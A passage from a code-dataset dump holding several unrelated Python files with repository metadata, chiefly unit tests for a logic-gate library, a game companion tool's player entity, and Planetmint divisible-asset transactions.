] | null | null | null | tests/gate/test_ORGate4.py | jamesjiang52/Bitwise | c71f151d23034b3f9e2a939f637be0eaa16c45c3 | [
"MIT"
] | null | null | null | tests/gate/test_ORGate4.py | jamesjiang52/Bitwise | c71f151d23034b3f9e2a939f637be0eaa16c45c3 | [
"MIT"
] | null | null | null | import bitwise as bw
class TestORGate4:
def test_ORGate4(self):
input_1 = bw.wire.Wire()
input_2 = bw.wire.Wire()
input_3 = bw.wire.Wire()
input_4 = bw.wire.Wire()
output = bw.wire.Wire()
a = bw.gate.ORGate4(input_1, input_2, input_3, input_4, output)
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 0
assert output.value == 0
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 1
assert output.value == 1
input_1.value = 0
input_2.value = 0
input_3.value = 1
input_4.value = 0
assert output.value == 1
input_1.value = 0
input_2.value = 0
input_3.value = 1
input_4.value = 1
assert output.value == 1
input_1.value = 0
input_2.value = 1
input_3.value = 0
input_4.value = 0
assert output.value == 1
input_1.value = 0
input_2.value = 1
input_3.value = 0
input_4.value = 1
assert output.value == 1
input_1.value = 0
input_2.value = 1
input_3.value = 1
input_4.value = 0
assert output.value == 1
input_1.value = 0
input_2.value = 1
input_3.value = 1
input_4.value = 1
assert output.value == 1
input_1.value = 1
input_2.value = 0
input_3.value = 0
input_4.value = 0
assert output.value == 1
input_1.value = 1
input_2.value = 0
input_3.value = 0
input_4.value = 1
assert output.value == 1
input_1.value = 1
input_2.value = 0
input_3.value = 1
input_4.value = 0
assert output.value == 1
input_1.value = 1
input_2.value = 0
input_3.value = 1
input_4.value = 1
assert output.value == 1
input_1.value = 1
input_2.value = 1
input_3.value = 0
input_4.value = 0
assert output.value == 1
input_1.value = 1
input_2.value = 1
input_3.value = 0
input_4.value = 1
assert output.value == 1
input_1.value = 1
input_2.value = 1
input_3.value = 1
input_4.value = 0
assert output.value == 1
input_1.value = 1
input_2.value = 1
input_3.value = 1
input_4.value = 1
assert output.value == 1
print(a.__doc__)
print(a)
a(input_1=0, input_2=0, input_3=0, input_4=0, output=None)
assert output.value == 0
| 23.121739 | 71 | 0.520496 | 391 | 2,659 | 3.332481 | 0.063939 | 0.216424 | 0.320798 | 0.207214 | 0.80967 | 0.80967 | 0.80967 | 0.80967 | 0.80967 | 0.80967 | 0 | 0.101422 | 0.391877 | 2,659 | 114 | 72 | 23.324561 | 0.704391 | 0 | 0 | 0.870968 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.182796 | 1 | 0.010753 | false | 0 | 0.010753 | 0 | 0.032258 | 0.021505 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
433f5b7353c932a38fee5f33b1eaee5c6eebf5b5 | 51 | py | Python | class2/run_from_here/ex1_top.py | patrebert/pynet_cert | b82cce3ddb20d9e4abc89d74579ddeb3513bdf55 | [
"Apache-2.0"
] | null | null | null | class2/run_from_here/ex1_top.py | patrebert/pynet_cert | b82cce3ddb20d9e4abc89d74579ddeb3513bdf55 | [
"Apache-2.0"
] | null | null | null | class2/run_from_here/ex1_top.py | patrebert/pynet_cert | b82cce3ddb20d9e4abc89d74579ddeb3513bdf55 | [
"Apache-2.0"
] | null | null | null | #!/bin/env python
import my_func
my_func.my_func()
| 12.75 | 17 | 0.764706 | 10 | 51 | 3.6 | 0.6 | 0.5 | 0.444444 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.098039 | 51 | 3 | 18 | 17 | 0.782609 | 0.313725 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
4a3b74c44dad04940f6f3ce24811a65a64dc4c90 | 220 | py | Python | ichnaea/data/__init__.py | crankycoder/ichnaea | fb54000e92c605843b7a41521e36fd648c11ae94 | [
"Apache-2.0"
] | 1 | 2019-05-12T05:51:19.000Z | 2019-05-12T05:51:19.000Z | ichnaea/data/__init__.py | crankycoder/ichnaea | fb54000e92c605843b7a41521e36fd648c11ae94 | [
"Apache-2.0"
] | null | null | null | ichnaea/data/__init__.py | crankycoder/ichnaea | fb54000e92c605843b7a41521e36fd648c11ae94 | [
"Apache-2.0"
] | null | null | null | """
Contains asynchronous tasks and data pipeline logic.
"""
from ichnaea import config
def _cell_export_enabled():
return bool(config.ASSET_BUCKET)
def _web_content_enabled():
return bool(config.MAP_TOKEN)
| 15.714286 | 52 | 0.759091 | 29 | 220 | 5.482759 | 0.793103 | 0.163522 | 0.213836 | 0.289308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.154545 | 220 | 13 | 53 | 16.923077 | 0.854839 | 0.236364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | true | 0 | 0.2 | 0.4 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
4a887a79ec4552c6b2c32c83eaebcf0fa394a3b1 | 4,123 | py | Python | edr/tests/test_edplayerone.py | blacksurgeon/edr | 809b30a0247961f6b92a968696afa4383c867b5e | [
"Apache-2.0"
] | 74 | 2018-01-30T10:44:20.000Z | 2022-03-24T23:13:30.000Z | edr/tests/test_edplayerone.py | blacksurgeon/edr | 809b30a0247961f6b92a968696afa4383c867b5e | [
"Apache-2.0"
] | 329 | 2017-11-20T12:18:21.000Z | 2022-03-31T22:21:49.000Z | edr/tests/test_edplayerone.py | blacksurgeon/edr | 809b30a0247961f6b92a968696afa4383c867b5e | [
"Apache-2.0"
] | 15 | 2018-02-08T09:22:46.000Z | 2022-03-27T13:05:54.000Z | import config_tests
from unittest import TestCase, main
from edentities import EDPlayerOne
import edvehicles
class TestEDPlayerOne(TestCase):
def test_in_solo_private(self):
cmdr = EDPlayerOne()
self.assertFalse(cmdr.in_solo_or_private())
cmdr = EDPlayerOne()
cmdr.game_mode = ""
self.assertFalse(cmdr.in_solo_or_private())
cmdr = EDPlayerOne()
cmdr.game_mode = "dummy"
self.assertFalse(cmdr.in_solo_or_private())
cmdr = EDPlayerOne()
cmdr.game_mode = "Open"
self.assertFalse(cmdr.in_solo_or_private())
cmdr = EDPlayerOne()
cmdr.game_mode = "Solo"
self.assertTrue(cmdr.in_solo_or_private())
cmdr = EDPlayerOne()
cmdr.game_mode = "Group"
self.assertTrue(cmdr.in_solo_or_private())
cmdr = EDPlayerOne()
cmdr.game_mode = "solo"
self.assertFalse(cmdr.in_solo_or_private())
cmdr = EDPlayerOne()
cmdr.game_mode = "group"
self.assertFalse(cmdr.in_solo_or_private())
def test_in_open(self):
cmdr = EDPlayerOne()
self.assertFalse(cmdr.in_open())
cmdr = EDPlayerOne()
cmdr.game_mode = ""
self.assertFalse(cmdr.in_open())
cmdr = EDPlayerOne()
cmdr.game_mode = "dummy"
self.assertFalse(cmdr.in_open())
cmdr = EDPlayerOne()
cmdr.game_mode = "Open"
self.assertTrue(cmdr.in_open())
cmdr = EDPlayerOne()
cmdr.game_mode = "open"
self.assertFalse(cmdr.in_open())
cmdr = EDPlayerOne()
cmdr.game_mode = "Group"
self.assertFalse(cmdr.in_open())
cmdr = EDPlayerOne()
cmdr.game_mode = "Solo"
self.assertFalse(cmdr.in_open())
def test_lifecycle_and_mode(self):
cmdr = EDPlayerOne()
ship = edvehicles.EDVehicleFactory.from_internal_name("empire_trader")
cmdr.game_mode = "Open"
cmdr.inception()
cmdr.update_vehicle_if_obsolete(ship)
self.assertTrue(cmdr.in_open())
self.assertEqual(cmdr.vehicle_type(), "Imperial Clipper")
cmdr.killed()
self.assertFalse(cmdr.in_open())
self.assertEqual(cmdr.vehicle_type(), "Imperial Clipper")
cmdr.resurrect()
self.assertTrue(cmdr.in_open())
self.assertEqual(cmdr.vehicle_type(), "Imperial Clipper")
cmdr.killed()
cmdr.resurrect(rebought = False)
self.assertTrue(cmdr.in_open())
self.assertNotEqual(cmdr.vehicle_type(), "Imperial Clipper")
def test_join_wing(self):
cmdr = EDPlayerOne()
cmdr.inception()
wing_members = ["Ozram", "Arguendo", "Patch"]
for member in wing_members:
self.assertFalse(cmdr.is_wingmate(member))
self.assertFalse(cmdr.is_wingmate("dummy"))
cmdr.join_wing(wing_members)
for member in wing_members:
self.assertTrue(cmdr.is_wingmate(member))
self.assertEquals(len(cmdr.wing.wingmates), 3)
self.assertFalse(cmdr.is_wingmate("dummy"))
cmdr.leave_wing()
self.assertEquals(len(cmdr.wing.wingmates), 0)
for member in wing_members:
self.assertFalse(cmdr.is_wingmate(member))
def test_add_to_wing(self):
cmdr = EDPlayerOne()
cmdr.inception()
wing_members = ["Ozram", "Arguendo", "Patch"]
for member in wing_members:
cmdr.add_to_wing(member)
self.assertTrue(cmdr.is_wingmate(member))
self.assertEquals(len(cmdr.wing.wingmates), 3)
cmdr.add_to_wing(wing_members[0])
self.assertEquals(len(cmdr.wing.wingmates), 3)
for member in wing_members:
self.assertTrue(cmdr.is_wingmate(member))
self.assertFalse(cmdr.is_wingmate("dummy"))
def test_vehicle_type(self):
cmdr = EDPlayerOne()
ship = edvehicles.EDVehicleFactory.from_internal_name("empire_trader")
cmdr.update_vehicle_if_obsolete(ship)
self.assertEqual(cmdr.vehicle_type(), "Imperial Clipper")
if __name__ == '__main__':
main() | 31.473282 | 78 | 0.630366 | 467 | 4,123 | 5.32334 | 0.143469 | 0.114642 | 0.13757 | 0.109815 | 0.847144 | 0.823411 | 0.797667 | 0.703942 | 0.703942 | 0.703942 | 0 | 0.001629 | 0.255639 | 4,123 | 131 | 79 | 31.473282 | 0.808407 | 0 | 0 | 0.769231 | 0 | 0 | 0.052861 | 0 | 0 | 0 | 0 | 0 | 0.346154 | 1 | 0.057692 | false | 0 | 0.038462 | 0 | 0.105769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4a8d0ac9a03900442eacc2ebc561e495cb17cac8 | 61 | py | Python | Helper/Math/__init__.py | robotsorcerer/LevelSetPy | 54064ee7fd0144e0d658dd4f6121cbc1fda664b9 | [
"MIT"
] | 4 | 2022-03-14T07:04:08.000Z | 2022-03-14T18:08:56.000Z | Helper/Math/__init__.py | robotsorcerer/LevelSetPy | 54064ee7fd0144e0d658dd4f6121cbc1fda664b9 | [
"MIT"
] | null | null | null | Helper/Math/__init__.py | robotsorcerer/LevelSetPy | 54064ee7fd0144e0d658dd4f6121cbc1fda664b9 | [
"MIT"
] | null | null | null | from .cell_mat_trace import *
from .cell_mat_mult import *
| 20.333333 | 30 | 0.770492 | 10 | 61 | 4.3 | 0.6 | 0.372093 | 0.511628 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.163934 | 61 | 2 | 31 | 30.5 | 0.843137 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4364544c03b207c2bdfd7828822a70416ac0e45f | 125 | py | Python | src/bisi/resources/config/__init__.py | UnyieldingOrca/bisi | 38f55e497aeb3483b73ffeedda6bddc6c25aa9b4 | [
"Apache-2.0"
] | 1 | 2022-02-02T02:32:44.000Z | 2022-02-02T02:32:44.000Z | src/bisi/resources/config/__init__.py | UnyieldingOrca/bisi | 38f55e497aeb3483b73ffeedda6bddc6c25aa9b4 | [
"Apache-2.0"
] | 7 | 2022-02-04T00:27:33.000Z | 2022-02-22T18:01:40.000Z | src/bisi/resources/config/__init__.py | UnyieldingOrca/bisi | 38f55e497aeb3483b73ffeedda6bddc6c25aa9b4 | [
"Apache-2.0"
] | 1 | 2022-02-13T20:00:58.000Z | 2022-02-13T20:00:58.000Z |
from .local_job_config import LocalJobConfig
from .ecr_config import ECRConfig
from .batch_job_config import BatchJobConfig
| 25 | 44 | 0.872 | 17 | 125 | 6.117647 | 0.588235 | 0.346154 | 0.288462 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.104 | 125 | 4 | 45 | 31.25 | 0.928571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
43774ef5c716cbc44b052b956f0deb7a4ef07d08 | 111 | py | Python | tests/parser/choice.35.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/choice.35.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/choice.35.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | input = """
a | b :- d.
c | d.
:- c, not d.
"""
output = """
a | b :- d.
c | d.
:- c, not d.
"""
| 7.4 | 13 | 0.279279 | 18 | 111 | 1.722222 | 0.388889 | 0.258065 | 0.193548 | 0.258065 | 0.645161 | 0.645161 | 0.645161 | 0.645161 | 0 | 0 | 0 | 0 | 0.414414 | 111 | 14 | 14 | 7.928571 | 0.476923 | 0 | 0 | 0.8 | 0 | 0 | 0.693069 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
437da55ef21ad0e83ab447b88118aaf76636904c | 23,672 | py | Python | tests/assets/test_divisible_assets.py | eckelj/planetmint | c7086a1982d781cb7ace62f1dff5cd63ed016ae0 | [
"Apache-2.0"
] | null | null | null | tests/assets/test_divisible_assets.py | eckelj/planetmint | c7086a1982d781cb7ace62f1dff5cd63ed016ae0 | [
"Apache-2.0"
] | null | null | null | tests/assets/test_divisible_assets.py | eckelj/planetmint | c7086a1982d781cb7ace62f1dff5cd63ed016ae0 | [
"Apache-2.0"
] | null | null | null | # Copyright © 2020 Interplanetary Database Association e.V.,
# Planetmint and IPDB software contributors.
# SPDX-License-Identifier: (Apache-2.0 AND CC-BY-4.0)
# Code is Apache-2.0 and docs are CC-BY-4.0
import pytest
import random
from planetmint.common.exceptions import DoubleSpend
# CREATE divisible asset
# Single input
# Single owners_before
# Single output
# Single owners_after
def test_single_in_single_own_single_out_single_own_create(alice, user_pk, b):
from planetmint.models import Transaction
tx = Transaction.create([alice.public_key], [([user_pk], 100)], asset={'name': random.random()})
tx_signed = tx.sign([alice.private_key])
assert tx_signed.validate(b) == tx_signed
assert len(tx_signed.outputs) == 1
assert tx_signed.outputs[0].amount == 100
assert len(tx_signed.inputs) == 1
# CREATE divisible asset
# Single input
# Single owners_before
# Multiple outputs
# Single owners_after per output
def test_single_in_single_own_multiple_out_single_own_create(alice, user_pk, b):
from planetmint.models import Transaction
tx = Transaction.create([alice.public_key], [([user_pk], 50), ([user_pk], 50)],
asset={'name': random.random()})
tx_signed = tx.sign([alice.private_key])
assert tx_signed.validate(b) == tx_signed
assert len(tx_signed.outputs) == 2
assert tx_signed.outputs[0].amount == 50
assert tx_signed.outputs[1].amount == 50
assert len(tx_signed.inputs) == 1
# CREATE divisible asset
# Single input
# Single owners_before
# Single output
# Multiple owners_after
def test_single_in_single_own_single_out_multiple_own_create(alice, user_pk, b):
from planetmint.models import Transaction
tx = Transaction.create([alice.public_key], [([user_pk, user_pk], 100)], asset={'name': random.random()})
tx_signed = tx.sign([alice.private_key])
assert tx_signed.validate(b) == tx_signed
assert len(tx_signed.outputs) == 1
assert tx_signed.outputs[0].amount == 100
output = tx_signed.outputs[0].to_dict()
assert 'subconditions' in output['condition']['details']
assert len(output['condition']['details']['subconditions']) == 2
assert len(tx_signed.inputs) == 1
# CREATE divisible asset
# Single input
# Single owners_before
# Multiple outputs
# Mix: one output with a single owners_after, one output with multiple
# owners_after
def test_single_in_single_own_multiple_out_mix_own_create(alice, user_pk, b):
from planetmint.models import Transaction
tx = Transaction.create([alice.public_key], [([user_pk], 50), ([user_pk, user_pk], 50)],
asset={'name': random.random()})
tx_signed = tx.sign([alice.private_key])
assert tx_signed.validate(b) == tx_signed
assert len(tx_signed.outputs) == 2
assert tx_signed.outputs[0].amount == 50
assert tx_signed.outputs[1].amount == 50
output_cid1 = tx_signed.outputs[1].to_dict()
assert 'subconditions' in output_cid1['condition']['details']
assert len(output_cid1['condition']['details']['subconditions']) == 2
assert len(tx_signed.inputs) == 1
# CREATE divisible asset
# Single input
# Multiple owners_before
# Output combinations already tested above
def test_single_in_multiple_own_single_out_single_own_create(alice, b, user_pk,
user_sk):
from planetmint.models import Transaction
from planetmint.common.transaction import _fulfillment_to_details
tx = Transaction.create([alice.public_key, user_pk], [([user_pk], 100)], asset={'name': random.random()})
tx_signed = tx.sign([alice.private_key, user_sk])
assert tx_signed.validate(b) == tx_signed
assert len(tx_signed.outputs) == 1
assert tx_signed.outputs[0].amount == 100
assert len(tx_signed.inputs) == 1
ffill = _fulfillment_to_details(tx_signed.inputs[0].fulfillment)
assert 'subconditions' in ffill
assert len(ffill['subconditions']) == 2
# TRANSFER divisible asset
# Single input
# Single owners_before
# Single output
# Single owners_after
def test_single_in_single_own_single_out_single_own_transfer(alice, b, user_pk,
user_sk):
from planetmint.models import Transaction
# CREATE divisible asset
tx_create = Transaction.create([alice.public_key], [([user_pk], 100)], asset={'name': random.random()})
tx_create_signed = tx_create.sign([alice.private_key])
# TRANSFER
tx_transfer = Transaction.transfer(tx_create.to_inputs(), [([alice.public_key], 100)],
asset_id=tx_create.id)
tx_transfer_signed = tx_transfer.sign([user_sk])
b.store_bulk_transactions([tx_create_signed])
assert tx_transfer_signed.validate(b)
assert len(tx_transfer_signed.outputs) == 1
assert tx_transfer_signed.outputs[0].amount == 100
assert len(tx_transfer_signed.inputs) == 1
# TRANSFER divisible asset
# Single input
# Single owners_before
# Multiple output
# Single owners_after
def test_single_in_single_own_multiple_out_single_own_transfer(alice, b, user_pk,
user_sk):
from planetmint.models import Transaction
# CREATE divisible asset
tx_create = Transaction.create([alice.public_key], [([user_pk], 100)], asset={'name': random.random()})
tx_create_signed = tx_create.sign([alice.private_key])
# TRANSFER
tx_transfer = Transaction.transfer(tx_create.to_inputs(),
[([alice.public_key], 50), ([alice.public_key], 50)],
asset_id=tx_create.id)
tx_transfer_signed = tx_transfer.sign([user_sk])
b.store_bulk_transactions([tx_create_signed])
assert tx_transfer_signed.validate(b) == tx_transfer_signed
assert len(tx_transfer_signed.outputs) == 2
assert tx_transfer_signed.outputs[0].amount == 50
assert tx_transfer_signed.outputs[1].amount == 50
assert len(tx_transfer_signed.inputs) == 1
# TRANSFER divisible asset
# Single input
# Single owners_before
# Single output
# Multiple owners_after
def test_single_in_single_own_single_out_multiple_own_transfer(alice, b, user_pk,
user_sk):
from planetmint.models import Transaction
# CREATE divisible asset
tx_create = Transaction.create([alice.public_key], [([user_pk], 100)], asset={'name': random.random()})
tx_create_signed = tx_create.sign([alice.private_key])
# TRANSFER
tx_transfer = Transaction.transfer(tx_create.to_inputs(),
[([alice.public_key, alice.public_key], 100)],
asset_id=tx_create.id)
tx_transfer_signed = tx_transfer.sign([user_sk])
b.store_bulk_transactions([tx_create_signed])
assert tx_transfer_signed.validate(b) == tx_transfer_signed
assert len(tx_transfer_signed.outputs) == 1
assert tx_transfer_signed.outputs[0].amount == 100
condition = tx_transfer_signed.outputs[0].to_dict()
assert 'subconditions' in condition['condition']['details']
assert len(condition['condition']['details']['subconditions']) == 2
assert len(tx_transfer_signed.inputs) == 1
b.store_bulk_transactions([tx_transfer_signed])
with pytest.raises(DoubleSpend):
tx_transfer_signed.validate(b)
# TRANSFER divisible asset
# Single input
# Single owners_before
# Multiple outputs
# Mix: one output with a single owners_after, one output with multiple
# owners_after
def test_single_in_single_own_multiple_out_mix_own_transfer(alice, b, user_pk,
user_sk):
from planetmint.models import Transaction
# CREATE divisible asset
tx_create = Transaction.create([alice.public_key], [([user_pk], 100)], asset={'name': random.random()})
tx_create_signed = tx_create.sign([alice.private_key])
# TRANSFER
tx_transfer = Transaction.transfer(tx_create.to_inputs(),
[([alice.public_key], 50), ([alice.public_key, alice.public_key], 50)],
asset_id=tx_create.id)
tx_transfer_signed = tx_transfer.sign([user_sk])
b.store_bulk_transactions([tx_create_signed])
assert tx_transfer_signed.validate(b) == tx_transfer_signed
assert len(tx_transfer_signed.outputs) == 2
assert tx_transfer_signed.outputs[0].amount == 50
assert tx_transfer_signed.outputs[1].amount == 50
output_cid1 = tx_transfer_signed.outputs[1].to_dict()
assert 'subconditions' in output_cid1['condition']['details']
assert len(output_cid1['condition']['details']['subconditions']) == 2
assert len(tx_transfer_signed.inputs) == 1
b.store_bulk_transactions([tx_transfer_signed])
with pytest.raises(DoubleSpend):
tx_transfer_signed.validate(b)
# TRANSFER divisible asset
# Single input
# Multiple owners_before
# Single output
# Single owners_after
def test_single_in_multiple_own_single_out_single_own_transfer(alice, b, user_pk,
user_sk):
from planetmint.models import Transaction
from planetmint.common.transaction import _fulfillment_to_details
# CREATE divisible asset
tx_create = Transaction.create([alice.public_key], [([alice.public_key, user_pk], 100)],
asset={'name': random.random()})
tx_create_signed = tx_create.sign([alice.private_key])
# TRANSFER
tx_transfer = Transaction.transfer(tx_create.to_inputs(), [([alice.public_key], 100)],
asset_id=tx_create.id)
tx_transfer_signed = tx_transfer.sign([alice.private_key, user_sk])
b.store_bulk_transactions([tx_create_signed])
assert tx_transfer_signed.validate(b) == tx_transfer_signed
assert len(tx_transfer_signed.outputs) == 1
assert tx_transfer_signed.outputs[0].amount == 100
assert len(tx_transfer_signed.inputs) == 1
ffill = _fulfillment_to_details(tx_transfer_signed.inputs[0].fulfillment)
assert 'subconditions' in ffill
assert len(ffill['subconditions']) == 2
b.store_bulk_transactions([tx_transfer_signed])
with pytest.raises(DoubleSpend):
tx_transfer_signed.validate(b)
# TRANSFER divisible asset
# Multiple inputs
# Single owners_before per input
# Single output
# Single owners_after
def test_multiple_in_single_own_single_out_single_own_transfer(alice, b, user_pk,
user_sk):
from planetmint.models import Transaction
# CREATE divisible asset
tx_create = Transaction.create([alice.public_key], [([user_pk], 50), ([user_pk], 50)],
asset={'name': random.random()})
tx_create_signed = tx_create.sign([alice.private_key])
# TRANSFER
tx_transfer = Transaction.transfer(tx_create.to_inputs(), [([alice.public_key], 100)],
asset_id=tx_create.id)
tx_transfer_signed = tx_transfer.sign([user_sk])
b.store_bulk_transactions([tx_create_signed])
assert tx_transfer_signed.validate(b)
assert len(tx_transfer_signed.outputs) == 1
assert tx_transfer_signed.outputs[0].amount == 100
assert len(tx_transfer_signed.inputs) == 2
b.store_bulk_transactions([tx_transfer_signed])
with pytest.raises(DoubleSpend):
tx_transfer_signed.validate(b)
# TRANSFER divisible asset
# Multiple inputs
# Multiple owners_before per input
# Single output
# Single owners_after
def test_multiple_in_multiple_own_single_out_single_own_transfer(alice, b, user_pk,
user_sk):
from planetmint.models import Transaction
from planetmint.common.transaction import _fulfillment_to_details
# CREATE divisible asset
tx_create = Transaction.create([alice.public_key], [([user_pk, alice.public_key], 50),
([user_pk, alice.public_key], 50)],
asset={'name': random.random()})
tx_create_signed = tx_create.sign([alice.private_key])
# TRANSFER
tx_transfer = Transaction.transfer(tx_create.to_inputs(), [([alice.public_key], 100)],
asset_id=tx_create.id)
tx_transfer_signed = tx_transfer.sign([alice.private_key, user_sk])
b.store_bulk_transactions([tx_create_signed])
assert tx_transfer_signed.validate(b) == tx_transfer_signed
assert len(tx_transfer_signed.outputs) == 1
assert tx_transfer_signed.outputs[0].amount == 100
assert len(tx_transfer_signed.inputs) == 2
ffill_fid0 = _fulfillment_to_details(tx_transfer_signed.inputs[0].fulfillment)
ffill_fid1 = _fulfillment_to_details(tx_transfer_signed.inputs[1].fulfillment)
assert 'subconditions' in ffill_fid0
assert 'subconditions' in ffill_fid1
assert len(ffill_fid0['subconditions']) == 2
assert len(ffill_fid1['subconditions']) == 2
b.store_bulk_transactions([tx_transfer_signed])
with pytest.raises(DoubleSpend):
tx_transfer_signed.validate(b)
# TRANSFER divisible asset
# Multiple inputs
# Mix: one input with a single owners_before, one input with multiple
# owners_before
# Single output
# Single owners_after
def test_muiltiple_in_mix_own_multiple_out_single_own_transfer(alice, b, user_pk,
user_sk):
from planetmint.models import Transaction
from planetmint.common.transaction import _fulfillment_to_details
# CREATE divisible asset
tx_create = Transaction.create([alice.public_key], [([user_pk], 50), ([user_pk, alice.public_key], 50)],
asset={'name': random.random()})
tx_create_signed = tx_create.sign([alice.private_key])
# TRANSFER
tx_transfer = Transaction.transfer(tx_create.to_inputs(), [([alice.public_key], 100)],
asset_id=tx_create.id)
tx_transfer_signed = tx_transfer.sign([alice.private_key, user_sk])
b.store_bulk_transactions([tx_create_signed])
assert tx_transfer_signed.validate(b) == tx_transfer_signed
assert len(tx_transfer_signed.outputs) == 1
assert tx_transfer_signed.outputs[0].amount == 100
assert len(tx_transfer_signed.inputs) == 2
ffill_fid0 = _fulfillment_to_details(tx_transfer_signed.inputs[0].fulfillment)
ffill_fid1 = _fulfillment_to_details(tx_transfer_signed.inputs[1].fulfillment)
assert 'subconditions' not in ffill_fid0
assert 'subconditions' in ffill_fid1
assert len(ffill_fid1['subconditions']) == 2
b.store_bulk_transactions([tx_transfer_signed])
with pytest.raises(DoubleSpend):
tx_transfer_signed.validate(b)
# TRANSFER divisible asset
# Multiple inputs
# Mix: one input with a single owners_before, one input with multiple
# owners_before
# Multiple outputs
# Mix: one output with a single owners_after, one output with multiple
# owners_after
def test_muiltiple_in_mix_own_multiple_out_mix_own_transfer(alice, b, user_pk,
user_sk):
from planetmint.models import Transaction
from planetmint.common.transaction import _fulfillment_to_details
# CREATE divisible asset
tx_create = Transaction.create([alice.public_key], [([user_pk], 50), ([user_pk, alice.public_key], 50)],
asset={'name': random.random()})
tx_create_signed = tx_create.sign([alice.private_key])
# TRANSFER
tx_transfer = Transaction.transfer(tx_create.to_inputs(),
[([alice.public_key], 50), ([alice.public_key, user_pk], 50)],
asset_id=tx_create.id)
tx_transfer_signed = tx_transfer.sign([alice.private_key, user_sk])
b.store_bulk_transactions([tx_create_signed])
assert tx_transfer_signed.validate(b) == tx_transfer_signed
assert len(tx_transfer_signed.outputs) == 2
assert tx_transfer_signed.outputs[0].amount == 50
assert tx_transfer_signed.outputs[1].amount == 50
assert len(tx_transfer_signed.inputs) == 2
cond_cid0 = tx_transfer_signed.outputs[0].to_dict()
cond_cid1 = tx_transfer_signed.outputs[1].to_dict()
assert 'subconditions' not in cond_cid0['condition']['details']
assert 'subconditions' in cond_cid1['condition']['details']
assert len(cond_cid1['condition']['details']['subconditions']) == 2
ffill_fid0 = _fulfillment_to_details(tx_transfer_signed.inputs[0].fulfillment)
ffill_fid1 = _fulfillment_to_details(tx_transfer_signed.inputs[1].fulfillment)
assert 'subconditions' not in ffill_fid0
assert 'subconditions' in ffill_fid1
assert len(ffill_fid1['subconditions']) == 2
b.store_bulk_transactions([tx_transfer_signed])
with pytest.raises(DoubleSpend):
tx_transfer_signed.validate(b)
# TRANSFER divisible asset
# Multiple inputs from different transactions
# Single owners_before
# Single output
# Single owners_after
def test_multiple_in_different_transactions(alice, b, user_pk, user_sk):
from planetmint.models import Transaction
# CREATE divisible asset
# `b` creates a divisible asset and assigns 50 shares to `b` and
# 50 shares to `user_pk`
tx_create = Transaction.create([alice.public_key], [([user_pk], 50), ([alice.public_key], 50)],
asset={'name': random.random()})
tx_create_signed = tx_create.sign([alice.private_key])
# TRANSFER divisible asset
# `b` transfers its 50 shares to `user_pk`
# after this transaction `user_pk` will have a total of 100 shares
# split across two different transactions
tx_transfer1 = Transaction.transfer(tx_create.to_inputs([1]),
[([user_pk], 50)],
asset_id=tx_create.id)
